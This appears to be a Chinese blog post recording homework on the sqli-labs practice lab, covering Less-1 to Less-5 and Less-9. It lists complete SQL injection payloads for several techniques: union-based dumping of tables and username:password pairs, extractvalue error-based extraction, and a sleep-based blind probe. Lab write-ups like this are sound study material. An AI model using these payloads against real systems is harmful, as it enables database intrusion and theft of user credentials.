sqli作业
📅 2026/7/24 6:43:04
👁️ 阅读次数
📝 编程学习
sqli作业
Less-1:单引号闭合
闭合方式:'
加个单引号看报错:
http://192.168.40.129/sqli/Less-1/?id=1'报错里'1'' LIMIT 0,1说明源码是WHERE id='$id',用'闭合就行。
ORDER BY 试列数:
?id=1' order by 4--+ # 报 Unknown column '4',列数=3UNION 找回显位:
?id=-1' union select 1,2,3--+2 和 3 回显在 name 和 Password。
然后直接梭哈:
爆库:?id=-1' union select 1,database(),3--+ 爆表:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 爆列:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+ 爆数据:?id=-1' union select 1,group_concat(username,0x3a,password),3 from users--+Less-2:整型
闭合方式:无(整型不需要闭合)
id=2-1返回第一个用户数据,说明是数字型:
爆库:?id=-1 union select 1,database(),3--+ 爆表:?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 爆列:?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+ 爆数据:?id=-1 union select 1,group_concat(username,0x3a,password),3 from users--+Less-3:单引号+括号
闭合方式:')
?id=1'源码是WHERE id=('$id')。
爆库:?id=-1') union select 1,database(),3--+ 爆表:?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 爆列:?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+ 爆数据:?id=-1') union select 1,group_concat(username,0x3a,password),3 from users--+Less-4:双引号+括号
闭合方式:")
?id=1"源码是WHERE id=("$id")。
爆库:?id=-1") union select 1,database(),3--+ 爆表:?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 爆列:?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+ 爆数据:?id=-1") union select 1,group_concat(username,0x3a,password),3 from users--+Less-5:报错注入(extractvalue)
闭合方式:'
页面只显示You are in...,不显示数据,但会报 MySQL 错误。用 union 查出来也看不到,改用报错注入。
?id=1' → 正常 ?id=1'--+ → 正常(闭合确认)extractvalue 一把梭:
爆库:?id=1' and extractvalue(1,concat(0x7e,database()))--+爆表:?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+ 爆列:?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database())))--+extractvalue 一次最多回显 32 字符,数据多的话用 substring 分段:
第1段:?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(username,0x3a,password) from users),1,30)))--+ 第2段:?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(username,0x3a,password) from users),30,30)))--+ ...以此类推Less-9:时间盲注
闭合方式:'
这个更狠,连报错都没有,永远只显示You are in...
只能靠 sleep 判断:
?id=1' and sleep(3)--+ → 页面卡3秒 → 有注入,闭合为 '确定闭合后上脚本爆破。
编程学习
技术分享
实战经验